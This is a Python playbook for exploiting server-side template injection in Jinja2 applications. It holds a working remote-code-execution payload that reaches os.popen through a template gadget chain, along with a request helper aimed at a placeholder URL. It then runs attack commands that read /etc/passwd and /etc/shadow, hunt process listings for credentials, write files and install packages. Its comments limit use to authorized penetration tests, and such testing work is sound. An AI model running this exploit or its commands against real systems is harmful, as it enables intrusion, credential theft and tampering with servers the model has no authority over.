SSTI - Server Side Template Injection Attack - Playbook (Jinja2 payloads; run only against targets you are explicitly authorized to test)
# %%
# Import libraries
import requests
import html
# %%
# Predefined request headers and the URL of the vulnerable endpoint; the injected form field is `content`.
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Language': 'en-US,en;q=0.9',
'Cache-Control': 'max-age=0',
'Content-Type': 'application/x-www-form-urlencoded',
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36',
}
url='http://example.com'
# send payload to server
def send_payload(payload):
data = {
'content': payload,
}
response = requests.post(url, headers=headers, data=data, verify=False)
response = response.text
# clean the response , unnessary objects .
response=response.split('<h1 style="font-size:100px;" align="center">')[1]
response=response.split('</h1>')[0]
response=html.unescape(response)
return response
# %%
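# Jinja2 gadget chain: from the template's context reach the `cycler` helper,
# then its __init__.__globals__ (the globals of jinja2.utils, which imports
# `os`), and run the command through os.popen. Only stdout is rendered;
# stderr is not captured, so a failed command shows up as an empty result.
# The command is spliced into a single-quoted string literal, so a command
# containing a single quote would terminate the literal and break the payload.
PAYLOAD_PREFIX = "{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('"
PAYLOAD_SUFFIX = "').read() }}"


def rce_payload(command: str) -> str:
    """Return the SSTI payload that executes *command* on the target.

    Args:
        command: Shell command line; it is run by the target's shell via os.popen.

    Returns:
        The template expression to submit through ``send_payload``.

    Raises:
        ValueError: *command* contains a single quote, which would break the
            string literal inside the payload.
    """
    if "'" in command:
        raise ValueError("command must not contain a single quote (')")
    return PAYLOAD_PREFIX + command + PAYLOAD_SUFFIX


def run_command(command: str) -> str:
    """Execute *command* on the target via SSTI and return its stdout."""
    return send_payload(rce_payload(command))


# %%
# Get information about os
command = 'cat /etc/os-release'
response = run_command(command)
print(response)
# %%
# Read current user: the privilege level of the web worker bounds everything below.
command = 'whoami'
response = run_command(command)
print(response)
# %%
# Read passwd file
command = 'cat /etc/passwd'
response = run_command(command)
print(response)
# %%
# Read shadow file. Readable only if the worker runs as root; an empty result
# almost certainly means a permission error that went to stderr.
command = 'cat /etc/shadow'
response = run_command(command)
print(response)
# %%
# Process listing: other services, credentials on command lines, container hints.
command = 'ps aux'
response = run_command(command)
print(response)
# %%
# NOTE: the remaining commands MODIFY the target (drop a file in the worker's
# working directory, install a package). Run them only when the engagement
# scope explicitly permits persistent changes, and log them for cleanup.
# The redirect produces no stdout, so an empty result is the expected outcome.
command = 'echo "hellow" > test.txt'
response = run_command(command)
print(response)
# %%
# Needs root and outbound network on the target; noisy and long-running, so
# the request may hit the client-side timeout before apt finishes.
command = 'apt update ; apt install apache2 -y'
response = run_command(command)
print(response)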